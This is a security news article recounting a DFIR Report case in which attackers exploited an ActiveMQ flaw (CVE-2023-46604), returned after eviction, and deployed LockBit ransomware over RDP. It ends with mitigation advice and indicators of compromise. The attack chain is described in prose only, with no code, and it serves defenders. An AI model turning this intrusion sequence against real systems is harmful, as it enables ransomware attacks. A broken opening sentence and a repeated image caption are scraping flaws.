Threat actors recently gained initial access to an organization's network by taking advantage of a vulnerability (CVE-2023-46604) in an Apache ActiveMQ server This article explores compromised systems using. . They were evicted following the initial intrusion, but eighteen days later they managed to breach the same server, which resulted in the deployment of the LockBit ransomware through Remote Desktop Protocol (RDP).

An internet-facing Apache ActiveMQ server that was susceptible to CVE-2023-46604 was the initial target of the attack in February 2024. They used a malicious XML configuration file in a Java Spring class to take advantage of this vulnerability. The compromised server used Windows CertUtil to carry out the command in this XML to download a payload from a distant server.

The attacker was able to escalate privileges and obtain SYSTEM-level access by using the payload, which turned out to be a Metasploit stager. The actor propagated throughout the network and compromised several systems by using lateral movement, SMB traffic, and Metasploit payloads. They obtained credentials and gained access to the LSASS process memory during this phase, which was essential for their subsequent actions.

RDP Access and Post-Exploitation Eighteen days after the first compromise, the threat actor came back to take advantage of the same unpatched Apache ActiveMQ server. They carried out lateral movement, LSASS memory access, and privilege escalation once they were back in the network.

LockBit is deployed by the ActiveMQ exploit (Source: thedfirreport). But this time, the attacker used the credentials they had taken from the first round to use RDP to access backup and file servers, among other servers. The attacker set up RDP for persistence and installed the AnyDesk remote access tool.

They dropped and ran the LockBit ransomware on several hosts throughout the network using RDP access. The LB3_pass.exe and LB3.exe ransomware files were run interactively through RDP sessions. Interestingly, instead of using the standard LockBit method of sending victims to a Tor leak site, the ransomware's ransom note was altered to instruct victims to use Session messaging. Deployment of LockBit Ransomware The ransomware was deployed across various systems, including backup servers and file servers.

The ransomware was executed by the attacker using particular flags that were probably intended to activate its SMB spreading mechanism. Ransom notes were left on compromised systems after the ransomware encrypted files all over the network. LockBit is deployed by the ActiveMQ exploit (Source: thedfirreport).

Since RDP was the main means by which the ransomware was executed and disseminated, its use for ransomware deployment emphasizes how crucial it is to secure remote access. The threat actor stopped operating after about four hours, leaving a trail of encrypted files and ransom demands in their wake. The Dfir Report claims that this attack is a prime example of the dangers associated with unpatched vulnerabilities in systems that are accessible over the internet and the possibility that attackers may reappear even after being initially evicted.

To reduce the risk of ransomware attacks like LockBit, organizations must prioritize patching known vulnerabilities, securing remote access, and keeping an eye out for indications of lateral movement. LockBit is deployed by the ActiveMQ exploit (Source: thedfirreport). Value of Indicator Type: SHA256 Ransomware C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE SHA256 Ransomware 8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6 IP C2/AnyDesk 166.62.100.52 The attacker's use of a compromised LockBit builder highlights the importance of prompt detection and action to stop extensive harm and further illustrates the increasing sophistication of ransomware operations.